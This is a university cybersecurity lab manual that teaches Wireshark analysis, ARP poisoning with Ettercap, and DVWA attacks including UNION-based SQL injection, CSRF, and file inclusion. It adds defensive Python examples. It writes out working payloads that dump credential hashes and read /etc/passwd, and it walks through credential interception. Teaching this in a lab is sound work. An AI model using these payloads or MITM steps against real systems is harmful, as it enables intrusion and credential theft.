CSE Cyber Security LAB Manual


KIET Group of Institutions, Ghaziabad

Department of CSE (AI) and CSE (AI&ML)

LAB MANUAL

Department of CSE (AI) and CSE (AI&ML)

13 KM STONE, GHAZIABAD-MEERUT ROAD, GHAZIABAD – 201206


Website: www.kiet.edu
KIET Group of Institutions, Ghaziabad
Department of CSE (AI) and CSE (AI&ML)

LIST OF EXPERIMENTS

Module 1: Packet Analysis using Wireshark


1. Basic Packet Inspection: Capture network traffic using Wireshark and analyze basic protocols like HTTP,
DNS, and SMTP to understand how data is transmitted and received.
2. Detecting Suspicious Activity: Analyze network traffic to identify suspicious patterns, such as repeated
connection attempts or unusual communication between hosts.
3. Malware Traffic Analysis: Analyze captured traffic to identify signs of malware communication, such as
command-and-control traffic or data exfiltration.
4. Password Sniffing: Simulate a scenario where a password is transmitted in plaintext. Use Wireshark to
capture and analyze the packets to demonstrate the vulnerability and the importance of encryption.
5. ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze the captured
packets to understand how the attack can lead to a Man-in-the-Middle scenario.

Module 2: Web Application Security using DVWA


1. SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can
manipulate input fields to extract, modify, or delete database information.
2. Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to inject malicious scripts into web
pages. Show the potential impact of XSS attacks, such as stealing cookies or defacing websites.
3. Cross-Site Request Forgery (CSRF): Set up a CSRF attack in DVWA to demonstrate how attackers can
manipulate authenticated users into performing unintended actions.
4. File Inclusion Vulnerabilities: Explore remote and local file inclusion vulnerabilities in DVWA. Show
how attackers can include malicious files on a server and execute arbitrary code.
5. Brute-Force and Dictionary Attacks: Use DVWA to simulate login pages and demonstrate brute-force and
dictionary attacks against weak passwords. Emphasize the importance of strong password policies.


Experiment 1
Aim: Capture network traffic using Wireshark and analyze basic protocols like HTTP, DNS and SMTP to
understand how data is transmitted and received.
Software Used: Wireshark
Procedure:
1. Download Wireshark from https://www.wireshark.org/ and install it.
2. Select an interface on which data is being transmitted and received, such as the Wi-Fi or Ethernet interface.
3. To start or stop capturing traffic on the interface, press Ctrl+E.
4. In the packet list (top pane) you will see the columns:
Number | Time | Source | Destination | Protocol | Length | Info
Middle pane (packet details) example:
- Frame
- Linux cooked capture
- Internet Protocol version, Source, Destination
- Transmission Control Protocol, src port, dst port, seq, length
WIRESHARK FILTERS
There are two ways to build a display filter:
- Build the filter via the GUI (Expression button)
- Type the filter into the "Apply a display filter" entry field (below the toolbar)
Reference: https://wiki.wireshark.org/DisplayFilters
MOST COMMON WIRESHARK FILTERS
- ip.src==192.168.246.154
- ip.dst==192.168.246.154
- tcp.srcport==443
- tcp.port eq 80
Filter for http and https traffic:
- tcp.port==443 or tcp.port==80
- ssl or http
- tcp.port in {80 443 8080}
- tcp.port==80 || tcp.port==443 || tcp.port==8080
Filter by protocol:
- tcp
- udp
- dns

Filter by IP address:
- ip.addr==192.168.1.1
- !(ip.addr==192.168.1.1)

Bottom pane (packet bytes):
- Data
Example filters for web traffic:
- http.request.uri=="website name" (for example, a page on https://demo.testfire.net)
- http.response.code==200
- http.request.method=="GET"
- tcp contains "admin"
Output:

Fig.1: Viewing a packet capture in Wireshark
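The display filters listed above each test a specific header field. The following added example (not code from the lab manual or from the Wireshark project) re-implements a handful of them over hand-built Ethernet/IPv4/TCP frames, so you can see exactly which bytes `ip.addr`, `tcp.port in {...}`, `tcp contains` and `http.request.method` look at. All frames, addresses and payloads are constructed sample data; checksums are left at zero because nothing here verifies them, and `tcp contains` is simplified to search the payload only.

```python
# Added example: a tiny dissector plus four display-filter predicates over constructed
# frames. Not Wireshark's code; everything below is sample data built in build_frame().
import socket
import struct
from typing import Callable, Dict, List, Set


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Build one raw frame: 14-byte Ethernet + 20-byte IPv4 + 20-byte TCP + payload."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", 0x0800)  # dst MAC, src MAC, EtherType=IPv4
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,  # ver/IHL, TOS, total len, id, flags, TTL, proto=TCP, csum
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp_hdr = struct.pack("!HHIIBBHHH",
                          sport, dport, 1, 0, 5 << 4, 0x18, 65535, 0, 0)  # ports, seq, ack, data offset=5 words, PSH|ACK
    return eth + ip_hdr + tcp_hdr + payload


# Constructed capture: a browser on 192.168.1.10 talking HTTP and TLS, and an SSH session from another host.
SAMPLE_FRAMES: List[bytes] = [
    build_frame("192.168.1.10", "93.184.216.34", 51000, 80,
                b"GET /login?user=admin HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    build_frame("192.168.1.10", "93.184.216.34", 51001, 443, b"\x16\x03\x01\x00\x10" + b"\x00" * 16),
    build_frame("192.168.1.20", "192.168.1.1", 51002, 22, b"SSH-2.0-OpenSSH_9.6\r\n"),
    build_frame("93.184.216.34", "192.168.1.10", 80, 51000, b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
]


def parse_frame(frame: bytes) -> Dict:
    """Decode the fields the filters below need; a very small version of what Wireshark's dissectors do."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return {"proto": "other"}
    ip_off = 14
    ihl = (frame[ip_off] & 0x0F) * 4
    pkt = {"proto": "ip",
           "ip.src": socket.inet_ntoa(frame[ip_off + 12:ip_off + 16]),
           "ip.dst": socket.inet_ntoa(frame[ip_off + 16:ip_off + 20])}
    if frame[ip_off + 9] == 6:  # IPv4 protocol number 6 = TCP
        tcp_off = ip_off + ihl
        sport, dport = struct.unpack("!HH", frame[tcp_off:tcp_off + 4])
        data_off = (frame[tcp_off + 12] >> 4) * 4
        pkt.update({"proto": "tcp", "tcp.srcport": sport, "tcp.dstport": dport,
                    "tcp.payload": frame[tcp_off + data_off:]})
    return pkt


# Each predicate corresponds to one display filter from the list above.
def ip_addr_eq(pkt: Dict, addr: str) -> bool:  # ip.addr==addr (matches either direction)
    return pkt.get("ip.src") == addr or pkt.get("ip.dst") == addr


def tcp_port_in(pkt: Dict, ports: Set[int]) -> bool:  # tcp.port in {80 443 8080}
    return pkt["proto"] == "tcp" and (pkt["tcp.srcport"] in ports or pkt["tcp.dstport"] in ports)


def tcp_contains(pkt: Dict, needle: bytes) -> bool:  # tcp contains "admin" (payload bytes, simplified)
    return pkt["proto"] == "tcp" and needle in pkt["tcp.payload"]


def http_request_method_eq(pkt: Dict, method: str) -> bool:  # http.request.method=="GET" (request-line check)
    return pkt["proto"] == "tcp" and pkt["tcp.payload"].startswith(method.encode() + b" ")


def matching_frames(predicate: Callable[[Dict], bool], frames: List[bytes] = SAMPLE_FRAMES) -> List[int]:
    """Return the indices of frames the filter accepts, as Wireshark's packet list would show them."""
    return [i for i, f in enumerate(frames) if predicate(parse_frame(f))]


if __name__ == "__main__":
    print("ip.addr==192.168.1.10       ->", matching_frames(lambda p: ip_addr_eq(p, "192.168.1.10")))
    print("tcp.port in {80 443 8080}   ->", matching_frames(lambda p: tcp_port_in(p, {80, 443, 8080})))
    print('tcp contains "admin"        ->', matching_frames(lambda p: tcp_contains(p, b"admin")))
    print('http.request.method=="GET"  ->', matching_frames(lambda p: http_request_method_eq(p, "GET")))
```

Note how `tcp contains "admin"` matches the plaintext HTTP request but not the TLS frame on port 443: once a credential travels inside TLS, a capture-side string search no longer finds it, which is the point Experiment 4 (Password Sniffing) makes about encryption.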


Figure 2: Drilling down into a packet to identify a network problem using Wireshark


Figure 3: Wireshark capturing packets


Experiment 2

Objective - Detecting Suspicious Activity: Analyze network traffic to identify suspicious patterns.
Tool Used: Wireshark
Procedure -
1. Open Wireshark.

2. Go to the Wi-Fi interface and start capturing.

3. Go to Statistics -> Protocol Hierarchy.

4. On inspection of the protocol hierarchy, if the 'Data' entry is not visible, no suspicious activity is
detected as per Wireshark.

Output -
1. On inspection of the protocol hierarchy, if the 'Data' entry is not visible, no suspicious activity is detected
as per Wireshark. File 1.

2. If the 'Data' section is visible, it could be suspicious traffic. Right click -> Apply as Filter -> Selected.


Experiment 3

Objective - Malware Traffic Analysis: Analyze captured traffic to identify signs of malware
communication.

Tool Used: Wireshark

Procedure -
1. Open Wireshark.

2. Go to the Wi-Fi interface and start capturing.

3. Go to File -> Export Objects -> HTTP.

4. Files whose content type is shown as 'application' could be malware (a virus).

5. Select any such file and save it.

Output -
1. Go to virustotal.com and upload the saved file there to inspect it for any possible malware.

2. If the file is safe, it will be visible as -

3. If the file is safe, it will be visible as -


Experiment 4
Objective - Malware Traffic Analysis: Analyze captured traffic to identify signs of malware
communication.

Tool Used: Wireshark

Procedure -
1. Open Wireshark.

2. Go to the Wi-Fi interface and start capturing.

3. Go to File -> Export Objects -> HTTP.

4. Files whose content type is shown as 'application' could be malware (a virus).

5. Select any such file and save it.

Output -
1. Go to virustotal.com and upload the saved file there to inspect it for any possible malware.

2. If the file is safe, it will be visible as -

3. If the file is safe, it will be visible as -


Experiment 05
Aim: ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze the
captured packets to understand how the attack can lead to a Man-in-the-Middle scenario.

Tool Used: Ettercap

Brief Theory: ARP spoofing is an attack against an Ethernet or Wi-Fi network to get between the router
and the target user. In an ARP-spoofing attack, messages meant for the target are sent to the attacker
instead, allowing the attacker to spy on, deny service to, or man-in-the-middle a target. One of the most
popular tools for performing this attack is Ettercap, which comes preinstalled on Kali Linux.

On a regular network, messages are routed over Ethernet or Wi-Fi by associating the MAC address of a
connected device with the IP address used to identify it by the router. Usually, this happens via an address
resolution protocol (ARP) message indicating which device's MAC address goes with which IP address. It
lets the rest of the network know where to send traffic — but it can be easily spoofed to change the way
traffic is routed.
In an ARP-spoofing attack, a program like Ettercap will send spoofed messages attempting to get nearby
devices to associate the hacker's MAC address with the IP address of the target. When successful, they're
stored temporarily in a configuration setting on other network devices. If the rest of the network starts
delivering packets intended for the target to the attacker instead, the attacker effectively controls the
target's data connection.
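The theory above describes what a poisoning tool sends; the same facts give the defender a detection rule. The following added example (not code from the lab manual or from Ettercap) is a small ARP monitor that learns IP-to-MAC bindings from observed ARP replies and raises an alert when an IP suddenly claims a different MAC, or when one MAC claims several IPs, which is what an attacker impersonating both the gateway and the victim looks like on the wire. The replies, addresses and the `pinned` seeding option are constructed assumptions for this demo.

```python
# Added example: defender-side ARP spoof detection over constructed ARP replies.
# Not Ettercap's or the manual's code; all MACs and IPs below are made up sample data.
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class ArpReply:
    ts: float          # capture time in seconds
    sender_ip: str     # ARP "sender protocol address"
    sender_mac: str    # ARP "sender hardware address"


# Constructed sample: gateway 192.168.1.1 and host 192.168.1.50 answer normally, then from
# t=10 a third MAC starts answering for both of them, which is what an ARP-poisoning tool does.
SAMPLE_REPLIES: List[ArpReply] = [
    ArpReply(1.0, "192.168.1.1", "00:11:22:33:44:01"),
    ArpReply(2.0, "192.168.1.50", "00:11:22:33:44:50"),
    ArpReply(10.0, "192.168.1.1", "de:ad:be:ef:00:99"),
    ArpReply(10.1, "192.168.1.50", "de:ad:be:ef:00:99"),
    ArpReply(11.0, "192.168.1.1", "de:ad:be:ef:00:99"),
]

Alert = Tuple[str, str, str]  # (kind, subject, detail)


def detect_arp_spoofing(replies: List[ArpReply],
                        pinned: Optional[Dict[str, str]] = None) -> List[Alert]:
    """Return alerts for IP->MAC changes and for MACs that claim more than one IP.

    `pinned` optionally seeds the table with known-good bindings (e.g. the gateway's real
    MAC); the first observed reply for any unpinned IP is trusted, as a real ARP cache would.
    """
    table: Dict[str, str] = dict(pinned or {})
    alerts: List[Alert] = []
    ips_by_mac: Dict[str, Set[str]] = defaultdict(set)
    for r in replies:
        ips_by_mac[r.sender_mac].add(r.sender_ip)
        known = table.get(r.sender_ip)
        if known is None:
            table[r.sender_ip] = r.sender_mac          # first sighting: learn it
        elif known != r.sender_mac:
            # Do not overwrite the learned binding: every spoofed reply should keep alerting.
            alerts.append(("ip-mac-change", r.sender_ip, f"t={r.ts}: {known} -> {r.sender_mac}"))
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            alerts.append(("mac-claims-many-ips", mac, ",".join(sorted(ips))))
    return alerts


if __name__ == "__main__":
    for kind, subject, detail in detect_arp_spoofing(SAMPLE_REPLIES):
        print(f"{kind:22s} {subject:20s} {detail}")
```

Wireshark's own ARP dissector raises the same condition as expert info ("Duplicate IP address detected"), so the display filter `arp.duplicate-address-detected` surfaces it in a capture taken during this experiment; pinning the gateway's MAC (a static ARP entry on the client, or dynamic ARP inspection on the switch) is the usual mitigation.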

Procedure:

Step 1: Connect to the Network


The first step of ARP spoofing is to connect to the network you want to attack. If you're attacking an
encrypted WEP, WPA, or WPA2 network, you'll need to know the password. This is because we're
attacking the network internally, so we need to be able to see some information about the other hosts on
the network and the data passing within it.

You can connect to a network for ARP spoofing in two ways. The first is to connect via Ethernet, which is
very effective but may not always be practical and is rarely subtle. Instead, many people prefer to use a
wireless network adapter and perform the ARP spoofing over Wi-Fi.


Step 2: Start Ettercap


In Kali, click on "Applications," then "Sniffing & Spoofing," followed by "ettercap-graphical."
Alternatively, click on the "Show Applications" option in the dock, then search for and select "Ettercap."
Once it starts up, you should find yourself on the Ettercap main screen. You'll see the spooky Ettercap
logo, and a few drop-down menus to start the attack from. In the next step, we'll start exploring the "Sniff"
menu.

Step 3: Select Network Interface to Sniff On


Click on the "Sniff" menu item, and then select "Unified sniffing." A new window will open asking you to
select which network interface you want to sniff on. You should select the network interface that is
currently connected to the network you're attacking.

Now, you'll see some text confirming that sniffing has started, and you'll be able to access more advanced
menu options such as Targets, Hosts, Mitm, Plugins, etc. Before we get started using any of them, we'll
need to identify our target on the network.


Step 4: Identify Hosts on a Network


To find the device we want to attack on the network, Ettercap has a few tricks up its sleeve. First, we can
do a simple scan for hosts by clicking "Hosts," then "Scan for hosts." A scan will execute, and after it
finishes, you can see the resulting hosts Ettercap has identified on the network by clicking "Hosts," then
"Hosts list."


Once in the Connections view, you can filter the connections by IP address, type of connection, and
whether the connection is open, closed, active, or killed. This gives you a lot of snooping power, which
can be augmented by clicking the "View," then "Resolve IP addresses." This means Ettercap will try to
resolve the IP addresses it sees other devices on the network connecting to.


If you want to identify a target on a network and know what they're browsing, look over their shoulder at
what website they're on, and match the website to an IP address with an active connection to the same
website. Otherwise, you can usually tell by the MAC address, as you can look it up online to see the
manufacturer.

Step 5: Select Hosts to Target with ARP Spoofing


Now that we've identified our target's IP address, it's time to add them to a target list. Once we do this,
we'll be telling Ettercap that we want to designate that IP address as one we want to pretend to be, so that
we're receiving messages from the router that were meant to be sent to the target.

Go back to the "Hosts" screen, and select the IP address of the host you want to target. Click the IP
address to highlight it, then click on "Targets," followed by "Target list," to see a list of devices that have
been targeted for ARP spoofing.

Now, we can go to the "Mitm" menu to start our attack on this target.

Step 6: Launch Attack on Targets


Click on the "Mitm" menu, and select "ARP poisoning." A popup will open, and you'll select "Sniff
remote connections" to begin the sniffing attack.


Once this attack has begun, you'll be able to intercept login credentials if the user you're targeting enters
them into a website that doesn't use HTTPS. This could be a router or a device on the network or even a
website that uses poor security.

To try another attack, you can click on "Plugins," then "Load plugins," to show the plugin menu. If you
select the DOS attack, it will begin dropping the packets sent to this target, cutting off their internet
access.


Step 7: Try Intercepting a Password


Now, let's actually try intercepting a password. A website that's great for testing is aavtrain.com, which
deliberately uses bad security so that you can intercept credentials. On the target device, navigate
to aavtrain.com. Once it loads, you'll see a login screen you can enter a fake login and password into.


Enter a username and password, then hit "Submit." If Ettercap is successful, you should see the login and
password you typed appear on the attacker's screen!


In the result above, we can see that Ettercap successfully ARP poisoned the target and intercepted an
HTTP login request the target was sending to an insecure website.


EXPERIMENT 06

Aim: SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can
manipulate input fields to extract, modify, or delete database information.

Tool Used: DVWA installed on Kali Linux

Procedure:
Step 1: Setup DVWA for SQL Injection
After successfully installing DVWA, open your browser and enter the URL 127.0.0.1/dvwa/login.php. Log in using the
username "admin" and the password "password". These are the default DVWA login credentials. After a successful login, set the
DVWA security level to Low, then click on SQL Injection on the left-side menu.

DVWA SQL Injection



Step 2: Basic Injection


On the User ID field, enter "1" and click Submit. That is supposed to print the ID, First_name, and Surname on the screen as you can
see below.

The SQL syntax being exploited here is:

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

DVWA Basic SQL Injection

Interestingly, when you check the URL, you will see there is an injectable parameter, which is the ID. Currently, my URL looks like this:

http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#


Let's change the ID parameter of the URL to a number like 1, 2, 3, 4, etc. That will also return the First_name and Surname of each user,
as follows:

ID: 2
First name: Gordon
Surname: Brown

ID: 3
First name: Hack
Surname: Me

ID: 4
First name: Pablo
Surname: Picasso

If you were executing this command directly on the DVWA database, the query for User ID 3 would look like this:

SELECT first_name, last_name FROM users WHERE user_id = '3';


SQL Injection

Step 3: Always True Scenario


An advanced method to extract all the First_names and Surnames from the database would be to use the input: %' or '1'='1
(the application's own closing quote completes the last string; a second trailing quote would leave the statement unterminated).

Always true injection


The percent sign % on its own matches no user_id, so that comparison is false. The '1'='1' condition is always true, since 1 always equals 1, so every row is returned.
If you were executing that on a database, the query would look like this:

SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';

SQL Injection
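To see why the always-true input works and what the fix looks like, the following added example (not code from the lab manual or from DVWA) places the string-built query from Step 2 next to a parameterized version and runs both against an in-memory SQLite table. DVWA uses MySQL; SQLite is used here only because it ships with Python, and the user rows are constructed sample data shaped like the output shown above.

```python
# Added example: vulnerable string concatenation versus a bound parameter, run on SQLite.
# Not DVWA's code; the users table below is constructed sample data.
import sqlite3
from typing import List, Tuple

# Constructed users, shaped like DVWA's table (the manual's output shows IDs 2-4).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
    (4, "Pablo", "Picasso"),
    (5, "Bob", "Smith"),
]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Mirrors DVWA 'low': $getid = "SELECT ... WHERE user_id = '$id'"; user input becomes SQL text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(query).fetchall()


def lookup_parameterized(con: sqlite3.Connection, user_id: str) -> List[Tuple]:
    """Hardened form: the value travels as a bound parameter, never as part of the statement."""
    return con.execute("SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()


def compare(user_id: str) -> Tuple[int, int]:
    """Row counts returned by the vulnerable and the parameterized lookup for the same input."""
    con = make_db()
    try:
        return len(lookup_vulnerable(con, user_id)), len(lookup_parameterized(con, user_id))
    finally:
        con.close()


if __name__ == "__main__":
    for value in ["3", "%' or '1'='1"]:
        vuln, safe = compare(value)
        print(f"{value!r:18} vulnerable={vuln} rows   parameterized={safe} rows")
```

With the bound parameter the whole input `%' or '1'='1` is compared against `user_id` as one literal value, so it matches nothing; the quote characters never reach the SQL parser, which is the property that makes the UNION-based steps below fail as well.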

Step 4: Display Database Version


To know the database version the DVWA application is running on, enter the text below in the User ID field.

%' or 0=0 union select null, version() #

The database version will be listed under surname in the last line as shown in the image below.


Display database version

Step 5: Display Database User


To display the database user whose account the PHP code uses to query the database, enter the text below in the User ID field.

%' or 0=0 union select null, user() #

The database user is listed next to the surname field in the last line as in the image below.


Display database user

Step 6: Display Database Name


To display the database name, we will inject the SQL code below in the User ID field.

%' or 0=0 union select null, database() #

The database name is listed next to the surname field in the last line.


Display database name

Step 7: Display all tables in information_schema


The information_schema stores information about the tables, columns, and all the other databases maintained by MySQL. To display all
the tables present in the information_schema, use the text below.

%' and 1=0 union select null, table_name from information_schema.tables #


Database schema

Step 8: Display all the user tables in information_schema


For this step, we will print all the tables whose names start with the prefix "user", as stored in the information_schema. Enter the SQL code
below in the User ID field.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#


User tables

Step 9: Display all the column fields in the information_schema users table


We will print all the columns present in the users table. This information will include column names like user_id, first_name,
last_name, user, and password. Enter the input below in the User ID field.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where
table_name = 'users' #


Column fields


Step 10: Display Column field contents


To display all the authentication information present in the columns of the users table identified in the previous step, use the SQL
syntax below:

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Column field contents
From the image above, you can see the password was returned in its hashed format. To recover the password, copy the MD5 hash
and use an application like John the Ripper to crack it. There are also sites on the internet where you can paste the hash and,
if lucky, you will be able to recover the password.


Experiment 8
Objective: Set up a CSRF attack in DVWA to demonstrate how attackers can manipulate
authenticated users into performing unintended actions.
Tool Used: DVWA

Brief Theory: CSRF (Cross-Site Request Forgery) is a type of attack where someone takes advantage of a
user's active session on a website to make them unintentionally perform actions they did not intend to. This
attack works when the user is already logged into the website or application.

DVWA Security: Low

Step 1: We have to look at the CSRF PHP source code. The flaw in this code is that it lacks proper CSRF protection.


It allows an attacker to craft a malicious URL and trick a logged-in user into unknowingly executing
unwanted actions on their behalf.

The vulnerability lies in the fact that the code does not include any mechanism to verify the origin of the
request. As a result, an attacker can construct a URL containing the necessary parameters
(password_new and password_conf) and send it to a victim. If the victim clicks on the malicious link while
authenticated on the vulnerable website, the code will execute the password change without any further
authentication or user consent.
Now we are going to perform the attack.
First, I will create a new password "123" and click on Change.

After changing the password, you can see in the URL that it lacks the necessary CSRF token. In the absence
of CSRF protection, an attacker can exploit this vulnerability by tricking the victim into clicking on the
URL while logged in to the vulnerable website. Now we will display the HTML code for the page, which
includes a link to download a game called "FIFA 2023"; when the link is followed, the password is changed by the attacker.
If the attacker sends this link to the victim, the password will be changed.


If the victim opens the HTML page, it will look like this.

When the victim clicks on the FIFA link, the password "12345" will be changed automatically.
We can see that the password has been changed.

Security: Medium

First things first, let's change the security level of DVWA.


If we try to use the low security method, it will not work anymore.


The flaw in this code is a Cross-Site Request Forgery (CSRF) vulnerability. The code uses the HTTP Referer
header to check if the request came from the same server, assuming it is a trusted source. However, the
Referer header can be easily manipulated by an attacker. This allows an attacker to create a malicious website
or craft a URL that makes a request to this script, tricking the user's browser into performing an unwanted
action on their behalf, such as changing their password without their knowledge or consent.
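The Referer check at the Medium level and the token the Low level is missing are two different defenses, and only one of them works. The following added example (not code from the lab manual or from DVWA) implements both checks over constructed password-change requests: a substring Referer test of the kind described above, and a per-session synchronizer token compared in constant time. The host name, session id and request shapes are assumptions made for this demo.

```python
# Added example: Referer-based check versus synchronizer-token check for a password-change
# handler. Not DVWA's code; SITE_HOST, the session id and the request dicts are constructed.
import hmac
import secrets
from typing import Dict, Optional

SITE_HOST = "dvwa.local"  # assumed host name of the vulnerable application


def referer_check(request: Dict) -> bool:
    """Medium-level style: accept when our host name appears in the Referer header.

    Weak for two reasons: the header is client-controlled (and often absent), and a
    substring test also accepts an unrelated origin whose name merely contains ours.
    """
    return SITE_HOST in request["headers"].get("Referer", "")


class TokenStore:
    """Per-session anti-CSRF tokens (the synchronizer token pattern)."""

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}

    def issue(self, session_id: str) -> str:
        token = secrets.token_hex(32)           # unguessable, bound to this session
        self._tokens[session_id] = token
        return token

    def validate(self, session_id: str, presented: Optional[str]) -> bool:
        expected = self._tokens.get(session_id)
        if expected is None or presented is None:
            return False
        return hmac.compare_digest(expected, presented)   # constant-time comparison


def change_password(request: Dict, store: TokenStore, mode: str) -> str:
    """Handle a password-change request using either the weak or the hardened check."""
    if mode == "referer":
        allowed = referer_check(request)
    elif mode == "token":
        allowed = store.validate(request["session"], request["form"].get("user_token"))
    else:
        raise ValueError(mode)
    if not allowed:
        return "rejected: request did not originate from our form"
    return "password changed"


def demo() -> Dict[str, str]:
    store = TokenStore()
    session = "sess-victim"                  # assumed session cookie value
    token = store.issue(session)
    legit = {"session": session,
             "headers": {"Referer": f"http://{SITE_HOST}/vulnerabilities/csrf/"},
             "form": {"password_new": "123", "password_conf": "123", "user_token": token}}
    # Forged request: the browser is on another site whose document URL happens to contain
    # our host name, so the Referer passes the substring test; the site cannot read the token.
    forged = {"session": session,
              "headers": {"Referer": f"http://{SITE_HOST}.attacker.example/fifa2023.html"},
              "form": {"password_new": "12345", "password_conf": "12345"}}
    return {
        "legit/referer": change_password(legit, store, "referer"),
        "forged/referer": change_password(forged, store, "referer"),
        "legit/token": change_password(legit, store, "token"),
        "forged/token": change_password(forged, store, "token"),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:16} {outcome}")
```

The token is what DVWA's High level adds (the `user_token` field the Low level URL is missing); marking the session cookie `SameSite=Lax` or `Strict` is a second, browser-enforced layer that stops the cookie from being attached to the forged request at all.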


Can you see the difference? Within the legitimate request we see there is a Referer, showing where the request came
from. That matches up, so the request goes ahead.
So what if we intercept the illegitimate request with Burp and add the HTTP Referer? Like so.


Password changed successfully. Now we will try to intercept the request to the website and add a legitimate Referer using
Burp Suite.


Experiment 09

Objective: Explore remote and local file inclusion vulnerabilities in DVWA. Show how attackers can
include malicious files on a server and execute arbitrary code.

Tool Used: DVWA

Brief Theory: Remote File Inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities that are often
found in poorly-written web applications. These vulnerabilities occur when a web application allows the user
to submit input into files or upload files to the server. In order to demonstrate these attacks, we will be using
the Damn Vulnerable Web Application (DVWA).

There are some prerequisites required:

1. XAMPP

2. Damn Vulnerable Web Application (DVWA)

Local File Inclusion in Action (Difficulty: LOW)

Now start your machine and log in to DVWA, then go to the DVWA Security tab and change the difficulty level to Low.


Go to the File Inclusion tab and change the URL from ?page=include.php to ?page=../../../../../../etc/passwd.

Change the URL from ?page=../../../../../../etc/passwd to ?page=../../../../../../proc/version.


Difficulty: MEDIUM

Now, go on and try the exploits we used in the Low difficulty. You will notice that you can't read files like before
using the directory traversal method. As you can see in the snapshot of the source page below, the server is
more secure and is filtering the '../' and '..\' patterns. Let's try to access the file without '../' or '..\'.

Change ?page=include.php to ?page=/etc/passwd


Now, change the URL from ?page=/etc/passwd to ?page=/proc/version.

As you can see, it worked by directly entering the absolute path of the file. Let's level up the difficulty to HIGH.

Difficulty: HIGH

Change the difficulty to HIGH and try all the exploits from the Medium difficulty, and you'll notice none of them
work because the target is more secure, as it is only accepting "include.php" or inputs starting with the
word "file". If you try anything else, it will show "File not Found".


At this level of security, we can still gather sensitive information using the "file" URI scheme (because it starts with
the word "file").

Change the URL from ?page=include.php to ?page=file:///etc/passwd

You will get the contents of the /etc/passwd file.

This is how you can exploit a file inclusion vulnerability using local files on the web server.
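Each level above fails for the same reason: the check looks at the characters the user typed rather than at where the path actually resolves. The following added example (not code from the lab manual or from DVWA) implements a blacklist filter of the Medium kind next to a resolve-and-contain check, and runs both over every input used in this experiment. The web root is a temporary directory created by `demo()`; the file names in it are assumptions made for the demo.

```python
# Added example: blacklist filtering of '../' versus resolving the path and checking that
# it stays inside the web root. Not DVWA's code; the root and files are created in demo().
import os
import tempfile
from typing import Dict, Optional


def medium_style_filter(page: str) -> str:
    """Mirrors a blacklist filter: strip '../' and '..\\' and hope nothing else reaches the disk."""
    return page.replace("../", "").replace("..\\", "")


def resolve_under_root(root: str, page: str) -> Optional[str]:
    """Allow-list approach: only a relative path that resolves to a location inside `root` is returned.

    Rejects URL schemes (file://, http://), absolute paths and traversal alike, because the
    decision is made on the resolved path, not on the characters the user typed.
    """
    if "://" in page or os.path.isabs(page):
        return None
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, candidate]) != root:
        return None                                     # escaped the web root
    return candidate


# Every ?page= value used in this experiment, plus one file placed just outside the root.
INPUTS = ["include.php", "../../../../../../etc/passwd", "/etc/passwd",
          "file:///etc/passwd", "../secret.txt"]


def demo() -> Dict[str, Dict[str, Optional[str]]]:
    """Run every input through both checks; returns what each would open, relative to the root."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "fi")
        os.mkdir(root)
        open(os.path.join(root, "include.php"), "w").close()   # the one legitimate page
        open(os.path.join(tmp, "secret.txt"), "w").close()     # sits just outside the root
        contained: Dict[str, Optional[str]] = {}
        for page in INPUTS:
            resolved = resolve_under_root(root, page)
            contained[page] = None if resolved is None else os.path.relpath(resolved, os.path.realpath(root))
    filtered = {page: medium_style_filter(page) for page in INPUTS}
    return {"medium_filter": filtered, "resolve_under_root": contained}


if __name__ == "__main__":
    for name, table in demo().items():
        print(name)
        for page, outcome in table.items():
            print(f"  {page:32} -> {outcome}")
```

The `medium_filter` row for `/etc/passwd` shows the input passing through untouched, which is exactly why the absolute-path step works at the Medium level; `resolve_under_root` rejects it, the `file://` form and the traversal form with the same rule, and would still reject any encoding of them because it never inspects the string itself.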


Remote File Inclusion in Action

Now, let's try to exploit this vulnerability using remote files hosted on the attacker machine.

Difficulty: LOW

Let's start with the Low difficulty.

Change the difficulty to Low and go to the File Inclusion tab.

Let's change include.php to http://www.google.com so the final URL will look something like this:

?page=http://www.google.com

Difficulty: MEDIUM

Change the difficulty to Medium and check as we did in the Low difficulty. You'll notice it's not working
anymore. The target is now filtering "http" and "https", as shown in the source page.


So try the attack with "HTTP" (in caps) or with any one letter in caps, as I used in the snapshot (httP), and
it'll work.

